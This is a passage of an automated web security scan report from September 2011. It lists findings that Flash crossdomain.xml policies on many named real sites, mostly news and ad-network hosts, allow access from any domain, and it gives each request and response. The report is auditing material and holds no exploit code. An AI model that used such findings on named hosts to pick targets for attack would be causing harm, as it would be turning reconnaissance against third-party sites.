Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: external.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "a27e344a618640558cd334164e432db0:1247617934"
Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Date: Wed, 07 Sep 2011 14:18:54 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.18. http://feed.video.news.com.au/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.video.news.com.au
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: feed.video.news.com.au

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Content-Length: 325
Last-Modified: Thu, 04 Aug 2011 11:13:54 GMT
Server: Jetty(6.1.19)
Date: Wed, 07 Sep 2011 14:14:53 GMT
Connection: close

<?xml version="1.0"?>

<!-- used for controlling cross-domain data loading in Macromedia Flash -->
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" />
   <allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.19. http://feeds.news.com.au/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feeds.news.com.au
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: feeds.news.com.au
Proxy-Connection: keep-alive
Referer: http://media.perthnow.com.au/ipad/300x250_GetMore_Swipe_RSS_Feed_PerthNow.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "ff684cff42d8e750dc963b501946080a:1214175420"
Last-Modified: Sun, 22 Jun 2008 22:57:00 GMT
Accept-Ranges: bytes
Content-Length: 275
Content-Type: application/xml
Date: Wed, 07 Sep 2011 14:14:54 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="ma
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.20. http://g-pixel.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://g-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: g-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Wed, 07 Sep 2011 14:14:19 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

3.21. http://g.ca.bid.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://g.ca.bid.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: g.ca.bid.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Wed, 07 Sep 2011 14:14:14 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

3.22. http://hpi.rotator.hadj7.adjuggler.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: hpi.rotator.hadj7.adjuggler.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"340-1315378660000"
Last-Modified: Wed, 07 Sep 2011 06:57:40 GMT
Content-Type: application/xml
Content-Length: 340
Date: Wed, 07 Sep 2011 14:14:18 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies=
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.23. http://i.w55c.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: i.w55c.net

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:17 GMT
Server: Jetty(6.1.22)
Cache-Control: max-age=86400
Content-Length: 488
content-type: application/xml
Via: 1.1 bfi061002 (MII-APC/2.1)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

   <allow-access-from domain="*" to-ports="*"/>
   <site-control
...[SNIP]...

3.24. http://ib.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 08-Sep-2011 14:14:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=-1; path=/; expires=Tue, 06-Sep-2016 14:14:12 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

3.25. http://img-cdn.mediaplex.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img-cdn.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img-cdn.mediaplex.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Content-Type: text/x-cross-domain-policy
Date: Wed, 07 Sep 2011 14:14:24 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.26. http://img.mediaplex.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:19 GMT
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.27. http://js.revsci.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Wed, 07 Sep 2011 14:14:28 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.28. http://l.yimg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://l.yimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: l.yimg.com

Response

HTTP/1.0 200 OK
Date: Wed, 07 Sep 2011 01:13:30 GMT
Cache-Control: max-age=315360000
Expires: Sat, 04 Sep 2021 01:13:30 GMT
Last-Modified: Mon, 01 Feb 2010 17:51:54 GMT
Accept-Ranges: bytes
Content-Length: 408
Vary: Accept-Encoding
Content-Type: application/xml
Age: 46926
Server: YTS/1.19.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xs
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

3.29. http://m.xp1.ru4.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: m.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 07 Sep 2011 14:14:14 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:32:05 GMT
Content-length: 202
Etag: "ca-4ceae155"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

3.30. http://map.media6degrees.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://map.media6degrees.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: map.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Wed, 07 Sep 2011 14:14:29 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.31. http://ndm.feeds.theplatform.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ndm.feeds.theplatform.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ndm.feeds.theplatform.com

Response

HTTP/1.0 200 OK
ETag: W/"187-1206468920250"
Last-Modified: Tue, 25 Mar 2008 18:15:20 GMT
Content-Type: text/xml
Content-Length: 187
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Date: Wed, 07 Sep 2011 14:14:46 GMT
X-Cache: HIT from feeds.theplatform.com
Via: 1.0 sea1squid01 (squid/3.0.STABLE23)
Connection: close

<?xml version="1.0"?>

<!-- used for controlling cross-domain data loading in Macromedia Flash -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>


3.32. http://pix04.revsci.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Wed, 07 Sep 2011 14:14:28 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.33. http://pixel.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Wed, 07 Sep 2011 14:14:20 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

3.34. http://pixel.quantserve.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Thu, 08 Sep 2011 14:14:09 GMT
Content-Type: text/xml
Content-Length: 207
Date: Wed, 07 Sep 2011 14:14:09 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

3.35. http://pt200194.unica.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pt200194.unica.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pt200194.unica.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 28 Jul 2010 19:24:08 GMT
ETag: "60471-107-48c778fc6a600"
Accept-Ranges: bytes
Content-Length: 263
P3P: CP="NOI DSP COR PSA ADMa DEVa OUR IND OTC"
Content-Type: text/xml
Expires: Wed, 07 Sep 2011 14:14:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 07 Sep 2011 14:14:36 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.36. http://s0.2mdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Tue, 06 Sep 2011 18:56:30 GMT
Expires: Wed, 07 Sep 2011 18:56:30 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 69528

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.37. http://s1.2mdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s1.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s1.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Tue, 06 Sep 2011 18:57:19 GMT
Expires: Wed, 07 Sep 2011 18:57:19 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 69487

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.38. http://secure-au.imrworldwide.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-au.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-au.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:32 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Wed, 14 Sep 2011 14:14:32 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

3.39. http://statse.webtrendslive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: statse.webtrendslive.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:6eb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 14:14:15 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

3.40. http://sync.mathtag.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x3 pid 0xc95 3221
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

3.41. http://tags.bluekai.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Wed, 07 Sep 2011 14:14:26 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Jun 2011 21:44:06 GMT
ETag: "6803d3-ca-4a6e0af03f580"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

3.42. http://www.7perth.com.au/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.7perth.com.au
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.7perth.com.au

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Wed, 07 Sep 2011 14:14:19 GMT
ETag: "2246f-64-4aa4f0e5de917"
Last-Modified: Fri, 12 Aug 2011 13:40:27 GMT
Server: Apache/2.2.16 (Amazon)
Content-Length: 100
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

3.43. http://www.abc.net.au/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.abc.net.au

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 31 Aug 2011 06:56:20 GMT
ETag: "16037c5-842-a01ded00"
Content-Type: text/xml
Expires: Wed, 07 Sep 2011 14:14:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 07 Sep 2011 14:14:12 GMT
Content-Length: 2114
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.abc.net.au" />
...[SNIP]...
<allow-access-from domain="abc.net.au" />
   <allow-access-from domain="*.usmob.com.au"/>
   <allow-access-from domain="usmob.com.au"/>
   <allow-access-from domain="rollermache.net" />
   <allow-access-from domain="www.rollermache.net" />
   <allow-access-from domain="www.abctv.net.au" />
   <allow-access-from domain="*.radioaustralia.net.au" />
   <allow-access-from domain="*.bayvut.com" />
   <allow-access-from domain="radioaustralia.net.au" />
   <allow-access-from domain="bayvut.com" />
   <allow-access-from domain="www.radioaustralia.net.au" />
   <allow-access-from domain="www.bayvut.com" />
   <allow-access-from domain="serve.a-feed.com" />
   <allow-access-from domain="220.233.4.205" />
   <allow-access-from domain="*.220.233.4.205" />
   <allow-access-from domain="www.gruen2.thefeds.com.au" />
   <allow-access-from domain="gruen2.thefeds.com.au" />
   <allow-access-from domain="wildspace.tv" />
   <allow-access-from domain="wildspace.thefeds.com.au" />
   <allow-access-from domain="*" />
   <allow-access-from domain=" moteldeception.thefeds.com.au "/>
   <allow-access-from domain="australianetwork.com" />
   <allow-access-from domain="www.australianetwork.com" />
   <allow-access-from domain="*.australianetwork.com" />
   <allow-access-from domain="australianetworkblogs.com" />
   <allow-access-from domain="*.australianetworkblogs.com" />
   <allow-access-from domain="*.sportsflash.com.au" />
   <allow-access-from domain="*.cadability.com.au" />    
   <allow-access-from domain="*.abceducation.net.au" />
   <allow-access-from domain="pluck.abc.net.au" />
   <allow-access-from domain="pluck2.abc.net.au" />
   <allow-access-from domain="pluckstage.abc.net.au" />
   <allow-access-from domain="pluck2stage.abc.net.au" />
...[SNIP]...

3.44. http://www.weatherchannel.com.au/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weatherchannel.com.au
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.weatherchannel.com.au

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: text/xml
Date: Wed, 07 Sep 2011 14:14:55 GMT
ETag: "315d9e4f6c82ca1:0"
Connection: close
Last-Modified: Mon, 21 Dec 2009 18:35:03 GMT
X-Powered-By: ASP.NET
X-Cache-Info: caching
Content-Length: 109

...<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.45. http://yql.yahooapis.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yql.yahooapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: yql.yahooapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Date: Wed, 07 Sep 2011 14:18:18 GMT
Server: YTS/1.19.8
Age: 0

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-policy>

3.46. http://adadvisor.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adadvisor.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

